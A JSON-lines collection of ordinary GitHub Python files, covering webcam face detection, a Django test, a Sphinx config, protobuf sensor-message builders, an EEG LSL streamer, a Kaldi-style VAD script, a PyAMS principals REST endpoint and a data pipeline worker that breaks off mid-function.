+{"seq_id":"11322645473","text":"import cv2 # Importing the OpenCV module\n\n# Importing the required cascade file for face detection\nhaar_cas = cv2.CascadeClassifier ('/Users/Aksha/PycharmProjects/Object-Detection/haar cascade/haarcascade_frontalface_default.xml')\n\n# Captures the webcam\nvideo_capture = cv2.VideoCapture(0)\n\nimg_counter = 0\n\nwhile True:\n # Capture each frame. As a webcam is used, the program will not run out of frames\n ret, frame = video_capture.read()\n # Converting to gray -> Almost all image manipulations are done using grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # Keyboard input for either exiting the program or taking a photo.\n k = cv2.waitKey(1)\n # Detecting the faces using the cascade file\n face = haar_cas.detectMultiScale(\n gray,\n scaleFactor=1.5,\n minNeighbors=5,\n minSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n # Draw the rectangle wherever the face is found.\n for (x, y, w, h) in face:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n # The top caption of the program\n cv2.imshow(\"Akshath Mangudi\", frame)\n\n if k % 256 == 27: # ESC button -> For exiting the program\n break\n elif k % 256 == 32: # ENTER button -> For taking a photo\n img_name = \"facedetection-{}.png\".format(img_counter)\n cv2.imwrite(img_name, frame)\n print(\"{} written!\".format(img_name))\n img_counter += 1\n\n\n# Releasing all windows.\nvideo_capture.release()\ncv2.destroyAllWindows()","repo_name":"akshathmangudi/Object-Detection","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"30020351277","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom .. import models\n\n\nUser = get_user_model()\n\n\nclass TweetModelTest(TestCase):\n\n def setUp(self):\n user = User.objects.create_user(username='ronaldtheodoro')\n self.tweet = models.Tweet.objects.create(\n content='My first tweet',\n user=user\n )\n\n def test_exists(self):\n self.assertTrue(models.Tweet.objects.exists())\n","repo_name":"RonaldTheodoro/tweetme","sub_path":"apps/tweet/test/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"40507969943","text":"import sys, os\nsys.path.append(os.path.dirname(os.path.abspath('../../shared/versions.py')))\nfrom versions import *\nsys.path.append(os.path.dirname(os.path.abspath('../../shared')))\n\n# -- General configuration ----------------------------------------------------\n\n# Set variable used to determine which package documentation this is\n# Can be one of 'arkode', 'cvode', 'cvodes', 'ida', 'idas', 'kinsol' or 'super'\npackage_name = 'super'\n\n# If your documentation needs a minimal Sphinx version, state it here.\nneeds_sphinx = '4.0'\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = ['sphinx_rtd_theme', 'sphinx.ext.ifconfig', 'sphinx.ext.mathjax',\n 'sphinxfortran.fortran_domain', 'sphinxcontrib.bibtex',\n 'sphinx_copybutton', 'sphinx_sundials']\n\n# References\nbibtex_bibfiles = ['../../shared/sundials.bib']\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['../../shared/_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\n#source_encoding = 'utf-8-sig'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'User Documentation for SUNDIALS'\ncopyright = \"\"\"2002-{year}, Lawrence Livermore National Security and Southern Methodist University\"\"\".format(year = year)\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nsun_version = '{sundials_version}'.format(sundials_version=sundials_version)\nversion = sun_version\n\n# Set the date format (full-month-name day, full-year)\ntoday_fmt = '%B %d, %Y'\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = []\n\n# The reST default role (used for this markup: `text`) to use for all documents.\n#default_role = None\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\n#add_function_parentheses = True\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\n#add_module_names = True\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\n#show_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\nhighlight_language = \"c\"\n\n# A list of ignored prefixes for module index sorting.\n#modindex_common_prefix = []\n\n# Number figures, tables, and code blocks (can reference by number with numref)\nnumfig = True\n\n# Override format strings that numref/numfig uses\nnumfig_format = {\n 'section': '§%s'\n}\n\nrst_prolog = open('../../shared/global.rst.txt', 'r').read()\n\nrst_epilog = \"\"\"\n.. |YEAR| replace:: {year}\n.. |CVODE_VERSION| replace:: {cvode_version}\n.. |CVODES_VERSION| replace:: {cvodes_version}\n.. |ARKODE_VERSION| replace:: {arkode_version}\n.. |IDA_VERSION| replace:: {ida_version}\n.. |IDAS_VERSION| replace:: {idas_version}\n.. 
|KINSOL_VERSION| replace:: {kinsol_version}\n\"\"\".format(year = year,\ncvode_version = cvode_version,\ncvodes_version = cvodes_version,\narkode_version = arkode_version,\nida_version = ida_version,\nidas_version = idas_version,\nkinsol_version = kinsol_version\n)\n\n# -- Options for HTML output ---------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = 'sphinx_rtd_theme'\n\n# Set theme options\nhtml_theme_options = {\n # Allow unlimited depth in table of contents tree\n 'navigation_depth': -1\n}\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\n#html_title = None\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\nhtml_logo = '../../shared/figs/sundials_logo_blue.png'\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\n#html_favicon = None\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['../../shared/_static']\n\n# These paths are either relative to html_static_path\n# or fully qualified paths (eg. https://...)\nhtml_css_files = [\n 'css/custom.css'\n]\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\nhtml_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n#html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_domain_indices = True\n\n# If false, no index is generated.\n#html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\nhtml_show_sourcelink = False\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\n#html_show_sphinx = True\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. Default is True.\n#html_show_copyright = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'SUNDIALSdoc'\n","repo_name":"LLNL/sundials","sub_path":"doc/superbuild/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","stars":411,"dataset":"github-code","pt":"92"}
+{"seq_id":"70230521899","text":"import cv2\nimport logging\nimport numpy as np\nimport time\n\nfrom record_msg import pypcd\n\nfrom modules.common_msgs.sensor_msgs import sensor_image_pb2, pointcloud_pb2\nfrom modules.common_msgs.localization_msgs import localization_pb2\nfrom modules.common_msgs.transform_msgs import transform_pb2\n\nclass Builder(object):\n def __init__(self) -> None:\n self._sequence_num = 0\n\n def _build_header(self, header,\n t=None, module_name=None, version=None, frame_id=None):\n header.sequence_num = self._sequence_num\n if t:\n header.timestamp_sec = t\n # todo(zero): no need to add?\n # header.camera_timestamp = int(t * 1e9)\n # header.lidar_timestamp = int(t * 1e9)\n if module_name:\n header.module_name = module_name\n if version:\n header.version = version\n if frame_id:\n header.frame_id = frame_id\n\n\nclass TransformBuilder(Builder):\n def __init__(self) -> None:\n super().__init__()\n\n def build(self, frame_id, child_frame_id, translation, rotation, t):\n pb_transformstampeds = transform_pb2.TransformStampeds()\n pb_transformstamped = pb_transformstampeds.transforms.add()\n if t is None:\n t = time.time()\n\n self._build_header(pb_transformstamped.header, t=t, frame_id=frame_id)\n pb_transformstamped.child_frame_id = child_frame_id\n pb_transformstamped.transform.translation.x = translation[0]\n pb_transformstamped.transform.translation.y = translation[1]\n pb_transformstamped.transform.translation.z = translation[2]\n\n pb_transformstamped.transform.rotation.qw = rotation[0]\n pb_transformstamped.transform.rotation.qx = rotation[1]\n pb_transformstamped.transform.rotation.qy = rotation[2]\n pb_transformstamped.transform.rotation.qz = rotation[3]\n\n self._sequence_num += 1\n return pb_transformstampeds\n\n\nclass LocalizationBuilder(Builder):\n def __init__(self) -> None:\n super().__init__()\n\n def build(self, translation, rotation, heading, t):\n pb_localization = localization_pb2.LocalizationEstimate()\n if t is None:\n t = time.time()\n\n self._build_header(pb_localization.header, t=t, module_name='localization')\n pb_localization.pose.position.x = translation[0]\n pb_localization.pose.position.y = translation[1]\n pb_localization.pose.position.z = translation[2]\n\n pb_localization.pose.orientation.qw = rotation[0]\n pb_localization.pose.orientation.qx = rotation[1]\n pb_localization.pose.orientation.qy = rotation[2]\n pb_localization.pose.orientation.qz = rotation[3]\n\n pb_localization.pose.heading = heading\n\n # todo(zero): need to complete\n # pb_localization.pose.linear_velocity\n # pb_localization.pose.linear_acceleration\n # pb_localization.pose.angular_velocity\n\n pb_localization.measurement_time = t\n self._sequence_num += 1\n return pb_localization\n\n\nclass ImageBuilder(Builder):\n def __init__(self) -> None:\n super().__init__()\n\n def _to_flag(self, encoding):\n if encoding == 'rgb8' or encoding == 'bgr8':\n return cv2.IMREAD_COLOR\n elif encoding == 'gray' or encoding == 'y':\n return cv2.IMREAD_GRAYSCALE\n else:\n print('Unsupported image encoding type: %s.' 
% encoding)\n return None\n\n def build(self, file_name, frame_id, encoding, t=None):\n pb_image = sensor_image_pb2.Image()\n flag = self._to_flag(encoding)\n if flag is None:\n return\n\n if t is None:\n t = time.time()\n\n self._build_header(pb_image.header, frame_id=frame_id)\n pb_image.frame_id = frame_id\n pb_image.measurement_time = t\n pb_image.encoding = encoding\n\n img = cv2.imread(file_name, flag)\n\n if flag == cv2.IMREAD_COLOR:\n pb_image.height, pb_image.width, channels = img.shape\n pb_image.step = pb_image.width * channels\n elif flag == cv2.IMREAD_GRAYSCALE:\n pb_image.height, pb_image.width = img.shape\n pb_image.step = pb_image.width\n else:\n return\n\n pb_image.data = img.tostring()\n self._sequence_num += 1\n return pb_image\n\n\nclass PointCloudBuilder(Builder):\n def __init__(self, dim=4) -> None:\n super().__init__()\n self._dim = dim\n\n def build(self, file_name, frame_id, t=None):\n pb_point_cloud = pointcloud_pb2.PointCloud()\n\n if t is None:\n t = time.time()\n\n self._build_header(pb_point_cloud.header, t=t, frame_id=frame_id)\n pb_point_cloud.frame_id = frame_id\n # pb_point_cloud.is_dense = False\n pb_point_cloud.measurement_time = t\n\n point_cloud = pypcd.point_cloud_from_path(file_name)\n\n pb_point_cloud.width = point_cloud.width\n pb_point_cloud.height = point_cloud.height\n\n for data in point_cloud.pc_data:\n point = pb_point_cloud.point.add()\n point.x, point.y, point.z, point.intensity, timestamp = data\n point.timestamp = int(timestamp * 1e9)\n\n self._sequence_num += 1\n return pb_point_cloud\n\n def build_nuscenes(self, file_name, frame_id, t=None, lidar_transform=None):\n pb_point_cloud = pointcloud_pb2.PointCloud()\n\n if t is None:\n t = time.time()\n\n self._build_header(pb_point_cloud.header, t=t, frame_id=frame_id)\n pb_point_cloud.frame_id = frame_id\n # pb_point_cloud.is_dense = False\n pb_point_cloud.measurement_time = t\n\n # Loads LIDAR data from binary numpy format.\n # Data is stored as (x, y, z, intensity, ring index).\n scan = np.fromfile(file_name, dtype=np.float32)\n logging.debug(scan[:100])\n\n points = scan.reshape((-1, self._dim))[:, :4]\n\n pb_point_cloud.width = len(points)\n pb_point_cloud.height = 1\n\n # Points shape is (length, 4)\n n0, _ = np.shape(points)\n for i in range(n0):\n point = pb_point_cloud.point.add()\n point.intensity = int(points[i][3])\n points[i][3] = 1\n point.x, point.y, point.z, _ = points[i] @ lidar_transform\n self._sequence_num += 1\n return pb_point_cloud\n","repo_name":"daohu527/record_msg","sub_path":"record_msg/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"}
+{"seq_id":"26135453274","text":"def read_sales(filename):\n total = 0.0\n count = 0\n\n with open(filename, \"r\") as f:\n for line in f:\n value = float(line.strip())\n\n total += value\n\n count += 1\n\n print(\"{:.2f}\".format(value))\n\n average = total / count if count > 0 else 0.0\n\n print(\"Total: {:.2f}\".format(total))\n print(\"Count: {}\".format(count))\n print(\"Average: {:.2f}\".format(average))\n\n\nif __name__ == \"__main__\":\n filename = \"sales_totals.txt\"\n read_sales(filename)\n","repo_name":"Dbooker62/PRG105","sub_path":"sales.py","file_name":"sales.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"11325378513","text":"#============================================================================\n# Code: Sending data stream via LSL\n# Author: Jiachen XU \n#\n# Last Update: 2019-11-29\n#============================================================================\n\n\nimport numpy as np\nimport time\nfrom scipy import io as sio\nfrom random import random as rand\n\nfrom pylsl import StreamInfo, StreamOutlet\n\n\nfs = 512 \nupdate_time = 0.01\n\nnsample = np.int(fs*update_time)\ndata = sio.loadmat('data/s01.mat', squeeze_me=True, struct_as_record=False, verify_compressed_data_integrity=False)['eeg']\n\nimagery_left = data.imagery_left - \\\n data.imagery_left.mean(axis=1, keepdims=True)\nimagery_right = data.imagery_right - \\\n data.imagery_right.mean(axis=1, keepdims=True)\n\neeg_data_l = np.vstack([imagery_left * 1e-6, data.imagery_event])\neeg_data_r = np.vstack([imagery_right * 1e-6,\n data.imagery_event * 2])\neeg_data = np.hstack([eeg_data_l, np.zeros((eeg_data_l.shape[0], 500)),\n eeg_data_r])\n\ndatamat = eeg_data \nif datamat.ndim != 2:\n raise ValueError(\"INPUT must be 2-dim!\")\nlen_off_data = datamat.shape[1]\ninfo = StreamInfo('BioSemi', 'EEG', datamat.shape[0], fs, 'float32', 'myuid34234')\noutlet = StreamOutlet(info)\naxis = np.arange(len_off_data)\nlive_index = np.arange(nsample)\nprint(\"now sending data...\")\ncounter = 0\nwhile True:\n mysample = datamat[:, counter].ravel().tolist()\n # now send it and wait\n outlet.push_sample(mysample)\n counter = 0 if counter == len_off_data - 1 else counter + 1\n time.sleep(1.0 / fs)\n","repo_name":"TateXu/jxu","sub_path":"onlinestream/lsl/examples/jxuSendData.py","file_name":"jxuSendData.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"26882939881","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nimport heapq\n#\n# Complete the 'minimumAverage' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts 2D_INTEGER_ARRAY customers as parameter.\ndef minWait(allOrders) :\n heapq.heapify(allOrders)\n totalWaitTime = 0\n numOrders = len(allOrders)\n if numOrders == 0 :\n return 0\n pendingOrders = []\n currentTime = allOrders[0][0]\n loop = True\n while loop :\n while len(allOrders) != 0 and allOrders[0][0] <= currentTime :\n order = heapq.heappop(allOrders) \n heapq.heappush(pendingOrders, (order[1], order[0]))\n if len(pendingOrders) != 0 :\n minWaitOrder = heapq.heappop(pendingOrders)\n waitTime = currentTime - minWaitOrder[1] + minWaitOrder[0]\n totalWaitTime += waitTime\n currentTime += minWaitOrder[0]\n else :\n currentTime += 1\n if len(pendingOrders) == 0 and len(allOrders) == 0 :\n loop = False\n return int(totalWaitTime/numOrders)\n\ndef minimumAverage(customers):\n # Write your code \n heapq.heapify(customers)\n csort = customers[0:]\n CH = [(csort[0][1],csort[0][0])]\n #OT = {csort[0][1]:[csort[0][0]]}\n WT = []\n prevOT = csort[0][0]\n csort.pop(0)\n loop = True\n j = 0\n while loop:\n while csort and csort[0][0] <= prevOT:\n ot,ct = heapq.heappop(csort)\n heapq.heappush(CH,(ot,ct))\n if CH:\n customer = heapq.heappop(CH)\n ctime,otime = customer\n #otime = heapq.heappop(OT[customer])\n wt_prev = WT[-1] if WT else 0\n wt_i = ctime + wt_prev + prevOT-otime\n WT.append(wt_i)\n prevOT = otime\n else:\n j+=1\n prevOT+=1\n if j > 100000:\n j = 0\n prevOT = csort[0][0]\n if not csort and not CH:\n break\n\n \n print(WT)\n return int(sum(WT)/len(WT))\n \n\n# if __name__ == '__main__':\n# fptr = open(os.environ['OUTPUT_PATH'], 'w')\nimport testcase_minavgwaittime3\nn = int(input().strip())\n\ncustomers = []\n\nfor _ in range(n):\n customers.append(list(map(int, input().rstrip().split())))\n\nresult = minWait(customers)\n\nprint(str(result) + '\\n')\n\n#fptr.close()\n","repo_name":"christophermoverton/codewars","sub_path":"minavgwaittime.py","file_name":"minavgwaittime.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"74924236781","text":"#!/usr/bin/env python\n\n# @Authors: Johan Rohdin\n# @Email: rohdin@fit.vutbr.cz\n\n# Kaldi style energy based VAD based on feature extraction code in the VBx recipe.\n# Based on \"predict.py\" by Lukas Burget, Federico Landini, Jan Profant in the\n# BUT-Phonexia VBx recipe and voice-activity-detection.cc/h by Vassil Panayotov,\n# Matthew Maciejewski, Daniel Povey in Kaldi.\n\nimport argparse, glob, os.path, shutil\nfrom src.utils import *\nimport soundfile as sf\nimport numpy as np\nimport re\nimport os\nfrom scipy.io import wavfile\n\ndef run_vad(input_dir:str, output_dir:str):\n \"\"\"\n Run VAD on an input directory, and generates output directory\n \"\"\"\n\n dither_type = \"N\" \n dither_value = 1\n vad_energy_threshold = 5.5\n vad_energy_mean_scale = 0.5\n vad_frames_context = 2\n vad_proportion_threshold = 0.12\n\n f_out = vad(input_dir, output_dir, dither_type, dither_value, vad_energy_threshold, vad_energy_mean_scale, vad_frames_context, vad_proportion_threshold)\n return f_out\n\ndef vad(filename, out_dir, dither_type, dither_value, vad_energy_threshold, vad_energy_mean_scale, vad_frames_context, vad_proportion_threshold):\n \"\"\"\n Kaldi-style energy-based voice activity detection\n \"\"\"\n\n f = filename\n\n np.random.seed(3) \n assert(vad_energy_mean_scale >= 0.0)\n \n file_name = f.split(\"/\")[-1][:-4]\n signal, samplerate = sf.read(f)\n\n # NOTE: Because we don't want any other features than energy, we set NUMCHANS=0.\n # This means fbank_mx.shape=(nfft/2+1,0) = (129,0) in this case. I.e. it is\n # an empty array.\n\n if samplerate == 8000:\n noverlap = 120 # 10ms * 8 sample/ms shift => 200 - 80 = 120 overlap\n winlen = 200 # 25ms * 8 sample/ms\n window = povey_window(winlen)\n fbank_mx = mel_fbank_mx(\n winlen, samplerate, NUMCHANS=0, LOFREQ=20.0, HIFREQ=3700, htk_bug=False)\n elif samplerate == 16000:\n noverlap = 240\n winlen = 400\n window = povey_window(winlen)\n fbank_mx = mel_fbank_mx(\n winlen, samplerate, NUMCHANS=0, LOFREQ=20.0, HIFREQ=7600, htk_bug=False)\n else:\n raise ValueError(f'Only 8kHz and 16kHz are supported. 
Got {samplerate} instead.')\n \n # Make the signal signed integer values although still as type float\n signal = (signal*2**15)\n\n # Apply dither\n if ( dither_type == \"U\" ):\n signal = add_dither(signal.astype(int), int(dither_value) ) \n elif ( dither_type == \"N\" ):\n signal += np.random.randn(signal.shape[0])*dither_value\n else:\n print(\"WARNING dither is not used\")\n\n # Mirror noverlap//2 initial and final samples (as Kaldi does)\n signal = np.r_[signal[noverlap // 2 - 1::-1],\n signal, signal[-1:-winlen // 2 - 1:-1]]\n\n \n log_energy = fbank_htk(signal, window, noverlap, fbank_mx, USEPOWER=True, ZMEANSOURCE=True, _E=\"first\", ENORMALISE=False)\n log_energy = np.squeeze( log_energy )\n \n energy_threshold = vad_energy_threshold + vad_energy_mean_scale * np.mean(log_energy)\n \n # This does the Kaldi style VAD smoothing.\n vad = np.zeros_like( log_energy )\n for t in range(len(log_energy)):\n num_count = den_count = 0\n context = vad_frames_context\n for t2 in range( t - context, t + context+1):\n if (t2 >= 0 and t2 < len(log_energy)):\n den_count +=1\n if (log_energy[t2] > energy_threshold):\n num_count +=1\n \n if (num_count >= den_count * vad_proportion_threshold):\n vad[t] = 1.0\n else:\n vad[t] = 0.0\n\n # Convert to HTK MLF format (with seconds as units) Print the VAD output\n f_out = file_name + \".lab\"\n\n #f_out = out_dir + \"/\" + re.sub('\\.wav$', '',f).split(\"/\")[-1] + \"/\" + re.sub('\\.wav$', '',f).split(\"/\")[-1] + \".lab\"\n with open(f_out, \"w\") as f:\n \n prev_sym = -1;\n n=0;\n speech_start =0;\n \n for sym in vad:\n if (sym == 1):\n if (prev_sym != 1):\n speech_start = n/100 #*100000\n prev_sym = 1; \n\n elif(sym == 0):\n if (prev_sym == 1):\n speech_end = n/100 #*100000\n f.write(str(speech_start) + \" \" + str(speech_end) + \" sp\\n\")\n prev_sym = 0; \n \n else:\n print(\"ERROR\")\n \n n +=1\n \n # If last one was speech we need to print it.\n if (prev_sym == 1):\n speech_end = n/100 #*100000\n f.write(str(speech_start) + \" \" + str(speech_end) + \" sp\\n\")\n prev_sym = 0\n \n signal, samplerate = sf.read(filename)\n\n full_signal = []\n\n f = open(f_out, \"r\")\n for line in f:\n\n times = line.split(\" \")\n start = int(float(times[0])*samplerate)\n end = int(float(times[1])*samplerate)\n\n data_split = np.array(signal)[start:end]\n full_signal.extend(data_split)\n \n full_signal = np.array(full_signal)\n\n wavfile.write(out_dir, samplerate, full_signal)\n","repo_name":"maelfabien/NLP_Summer_School-2021_Speech_Demo","sub_path":"src/vad.py","file_name":"vad.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"92"}
+{"seq_id":"327760143","text":"import sys\n\nfrom colander import MappingSchema, SchemaNode, SequenceSchema, String, drop\nfrom cornice import Service\nfrom cornice.validators import colander_validator\nfrom pyramid.httpexceptions import HTTPOk\n\nfrom pyams_security.interfaces import ISecurityManager\nfrom pyams_security.interfaces.base import USE_INTERNAL_API_PERMISSION\nfrom pyams_security.rest import check_cors_origin, set_cors_headers\nfrom pyams_security_views.interfaces import REST_PRINCIPALS_SEARCH_ROUTE\nfrom pyams_utils.registry import query_utility\nfrom pyams_utils.rest import BaseResponseSchema, STATUS, rest_responses\n\n__docformat__ = 'restructuredtext'\n\n\nTEST_MODE = sys.argv[-1].endswith('/test')\n\n\nclass PrincipalsSearchQuery(MappingSchema):\n \"\"\"Principals search query\"\"\"\n term = SchemaNode(String(),\n description=\"Principals search string\")\n\n\nclass Principal(MappingSchema):\n \"\"\"Principal result schema\"\"\"\n id = SchemaNode(String(),\n description=\"Principal ID\")\n text = SchemaNode(String(),\n description=\"Principal title\")\n\n\nclass PrincipalsList(SequenceSchema):\n \"\"\"Principals search results interface\"\"\"\n result = Principal()\n\n\nclass PrincipalsSearchResults(BaseResponseSchema):\n \"\"\"Principals search results schema\"\"\"\n results = PrincipalsList(description=\"List of principals matching input term\",\n missing=drop)\n\n\nprincipals_service = Service(name=REST_PRINCIPALS_SEARCH_ROUTE,\n pyramid_route=REST_PRINCIPALS_SEARCH_ROUTE,\n description=\"Principals management\")\n\n\n@principals_service.options(validators=(check_cors_origin, set_cors_headers))\ndef principals_options(request): # pylint: disable=unused-argument\n \"\"\"Principals service options\"\"\"\n return ''\n\n\nclass PrincipalsSearchRequest(MappingSchema):\n \"\"\"Principals search request\"\"\"\n querystring = PrincipalsSearchQuery()\n\n\nclass PrincipalsGetterResponse(MappingSchema):\n \"\"\"Principals getter response\"\"\"\n body = PrincipalsSearchResults()\n\n\nprincipals_get_responses = rest_responses.copy()\nprincipals_get_responses[HTTPOk.code] = PrincipalsGetterResponse(\n description=\"Search results\")\n\n\n@principals_service.get(permission=USE_INTERNAL_API_PERMISSION,\n schema=PrincipalsSearchRequest(),\n validators=(check_cors_origin, colander_validator, set_cors_headers),\n response_schemas=principals_get_responses)\ndef get_principals(request):\n \"\"\"Returns list of principals matching given query\"\"\"\n params = request.params if TEST_MODE else request.validated.get('querystring', {})\n query = params.get('term')\n if not query:\n return {\n 'status': STATUS.ERROR.value,\n 'message': \"Missing arguments\"\n }\n manager = query_utility(ISecurityManager)\n return {\n 'status': STATUS.SUCCESS.value,\n 'results': [{\n 'id': principal.id,\n 'text': principal.title\n } for principal in manager.find_principals(query)]\n }\n","repo_name":"Py-AMS/pyams-security-views","sub_path":"src/pyams_security_views/api/principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"42202212738","text":"import asyncio\nimport logging\nimport time\nimport traceback\nfrom datetime import datetime\nfrom functools import lru_cache\n\nfrom model.model.pipeline.trigger_type import TriggerType\n\nimport watchmen\nfrom watchmen.common.constants import pipeline_constants\nfrom watchmen_boot.guid.snowflake import get_surrogate_key\nfrom watchmen.common.utils.data_utils import get_id_name_by_datasource\nfrom watchmen_boot.config.config import settings\nfrom watchmen.database.datasource.container import data_source_container\nfrom watchmen.monitor.model.pipeline_monitor import PipelineRunStatus, StageRunStatus\nfrom watchmen.monitor.services import pipeline_monitor_service\nfrom watchmen.pipeline.core.context.pipeline_context import PipelineContext\nfrom watchmen.pipeline.core.context.stage_context import StageContext\nfrom watchmen.pipeline.core.parameter.parse_parameter import parse_parameter_joint\nfrom watchmen.pipeline.core.worker.stage_worker import run_stage\nfrom watchmen.pipeline.utils.constants import PIPELINE_UID, FINISHED, ERROR\nfrom watchmen.topic.storage.topic_schema_storage import get_topic_by_id, get_topic_by_name\n\nlog = logging.getLogger(\"app.\" + __name__)\n\n\n@lru_cache(maxsize=20)\ndef __build_merge_key(topic_name, trigger_type):\n return topic_name + \"_\" + trigger_type.value\n\n\ndef __merge_pipeline_data(pipeline_trigger_merge_list):\n merge_context = {}\n for pipeline_data in pipeline_trigger_merge_list:\n\n if pipeline_data.topicName in merge_context:\n data_list = merge_context[pipeline_data.topicName].get(pipeline_data.triggerType.value, [])\n data_list.append(pipeline_data.data)\n merge_context[pipeline_data.topicName][pipeline_data.triggerType.value] = data_list\n else:\n merge_context[pipeline_data.topicName] = {pipeline_data.triggerType.value: [pipeline_data.data]}\n\n return merge_context\n\n\ndef __trigger_all_pipeline(pipeline_trigger_merge_list, current_user=None, trace_id=None):\n after_merge_list = __merge_pipeline_data(pipeline_trigger_merge_list)\n\n for topic_name, item in after_merge_list.items():\n merge_data = {}\n topic = get_topic_by_name(topic_name,current_user)\n if TriggerType.update.value in item:\n for update_data in item[TriggerType.update.value]:\n old_value = update_data[pipeline_constants.OLD]\n pk = old_value[\n get_id_name_by_datasource(data_source_container.get_data_source_by_id(topic.dataSourceId))]\n if pk in merge_data:\n merge_data[pk][pipeline_constants.NEW].update(update_data[pipeline_constants.NEW])\n else:\n merge_data[pk] = {pipeline_constants.NEW: update_data[pipeline_constants.NEW],\n pipeline_constants.OLD: update_data[pipeline_constants.OLD]}\n\n for key, data in merge_data.items():\n watchmen.pipeline.index.trigger_pipeline(topic_name, data, TriggerType.update, current_user,\n trace_id)\n if TriggerType.insert.value in item:\n for insert_data in item[TriggerType.insert.value]:\n watchmen.pipeline.index.trigger_pipeline(topic_name, insert_data, TriggerType.insert, current_user,\n trace_id)\n\n\ndef should_run(pipeline_context: PipelineContext) -> bool:\n pipeline = pipeline_context.pipeline\n if pipeline.on is None:\n return True\n current_data = pipeline_context.currentOfTriggerData\n variables = pipeline_context.variables\n return parse_parameter_joint(pipeline.on, current_data, variables)\n\n\nasync def sync_pipeline_monitor_log(pipeline_status):\n pipeline_monitor_service.sync_pipeline_monitor_data(pipeline_status)\n\n\n# noinspection PyBroadException\ndef run_pipeline(pipeline_context: 
PipelineContext,current_user):\n pipeline = pipeline_context.pipeline\n data = pipeline_context.data\n pipeline_status = PipelineRunStatus(pipelineId=pipeline.pipelineId, uid=get_surrogate_key(),\n startTime=datetime.now().replace(tzinfo=None), topicId=pipeline.topicId,\n tenantId=pipeline_context.currentUser.tenantId,\n traceId=pipeline_context.traceId, pipelineName=pipeline.name)\n pipeline_status.oldValue = data.get(pipeline_constants.OLD)\n pipeline_status.newValue = data.get(pipeline_constants.NEW)\n pipeline_status.currentUser = pipeline_context.currentUser\n if pipeline_context.currentUser is None:\n raise Exception(\"pipeline_context currentUser is None\")\n\n if pipeline.enabled:\n pipeline_topic = get_topic_by_id(pipeline.topicId)\n pipeline_status.pipelineTopicName = pipeline_topic.name\n pipeline_context = PipelineContext(pipeline, data, pipeline_context.currentUser, pipeline_context.traceId)\n pipeline_context.variables[PIPELINE_UID] = pipeline_status.uid\n pipeline_context.pipelineTopic = pipeline_topic\n pipeline_context.pipelineStatus = pipeline_status\n start = time.time()\n if should_run(pipeline_context):\n # noinspection PyBroadException\n try:\n for stage in 